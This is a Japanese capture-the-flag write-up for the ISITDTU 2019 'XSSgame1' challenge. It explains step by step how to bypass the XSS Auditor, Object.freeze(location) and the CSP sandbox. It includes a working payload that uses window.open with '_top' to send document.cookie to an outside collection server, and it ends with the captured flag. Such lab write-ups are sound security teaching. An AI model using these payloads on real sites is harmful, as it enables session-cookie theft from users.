ISITDTU CTF 2019 Quals Writeup - XSSgame1
Question
This is a XSS game, Try execute script and get cookie in Chrome http://165.22.52.11/XSSGAME1/
Solution
click me
のリンクを押下するとhttp://165.22.52.11/XSSGAME1/?pl=xss
に遷移する。
HTMLソースは以下の通り。
/*** We prevent change the location ***: <script>Object.freeze(location);</script>xss<br><script>location='http://xss';</script>
HTTPレスポンスヘッダーは以下の通り。
HTTP/1.1 200 OK Date: Sun, 30 Jun 2019 12:55:23 GMT Server: Apache/2.4.29 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';sandbox allow-scripts allow-same-origin X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Content-Length: 132 Content-Type: text/html; charset=UTF-8
Bot checkのhere
リンクを押下すると、URLを入力する画面に遷移する。
問題文より、pl
パラメータにcookieを窃取するスクリプトをセットしたURLを入力すれば良さそうだ。
Stage1. XSS Auditorのバイパス
HTTPレスポンスヘッダーにX-XSS-Protection: 1; mode=block
が設定されており、XSS Auditorがblockモードで有効になっているため、pl
パラメータに単純なXSSのペイロードを設定してもNG。
pl
パラメータに%3Cscript%3Ealert(1)%3C/script%3E
をセットしてソース表示すると、以下のとおりXSS Auditorが反応する。
HTMLソース内に窃取する情報は無いため、最近のCTFでよく出題されるXS-Searchを利用する問題では無さそうだ。
ポイントは、2か所の注入ポイントがある点。以下の@kinugawamasato氏の記事が参考になる。
github.com
そのまま試してみるとNot Allow
の表示。backtickの記号がブラックリストに入っているようだ。同様に'
(シングルクォーテーション)もNG。ただ、"
(ダブルクォーテーション)は許された。
$ curl http://165.22.52.11/XSSGAME1/?pl=%22-alert(1)%3C/script%3E%3Cscript%3E%22 /*** We prevent change the location ***: <script>Object.freeze(location);</script>"-alert(1)</script><script>"<br><script>location='http://"-alert(1)</script><script>"';</script>
2つ目のscriptタグの最初の"<br><script>location='http://"
の部分が文字列として扱われるため、次の-alert(1)
がダブルクォーテーション内から脱出できて、実行できる。
しかし、Chromeで実行するとアラートは表示されない。開発者ツールのコンソールを見ると以下の表示。
CSPの設定により、アラート表示ができなかったが、alertの代わりにconsole.logを使用したところ実行できた。
Stage2 Object.freeze(location)のバイパス
最初にObject.freeze(location);
が実行されているため、location.href="http://myserver/?q=" + document.cookie
のように、location.href
を使用した画面遷移によるCookie窃取はできない。
CSPのdefault-src 'self';
により、iframe、img、XHR等で自サーバにリクエスト発行することもできない。
また、sandboxが設定されており、allow-popups
が許可されていないため、window.openによって新規ウィンドウを開いてリクエスト発行することもできない。
location.href
以外に、トップレベルナビゲーションの画面遷移を行う方法を考える。
window.open
の第2引数にターゲットを指定できることに着目する。
_blank
や適当な文字列を設定すると新規ウィンドウで開くが、_top
を指定するとトップフレームを指定できる。その結果、トップレベルナビゲーションによる画面遷移が可能となる。
以下のURLにWebブラウザでアクセスしてみる。
http://165.22.52.11/XSSGAME1/?pl=";window.open("http://myserver/?"%2Bdocument.cookie,"_top")</script><script>"
自サーバ(今回はrequestbin.netを使用)にリクエストが来た。BINGO。
Bot checkの画面で投稿すると、フラグが降ってきた。
フラグゲット
ISITDTU{0274fdcad72fb003e36bb77d9ef2279b3eb3f519}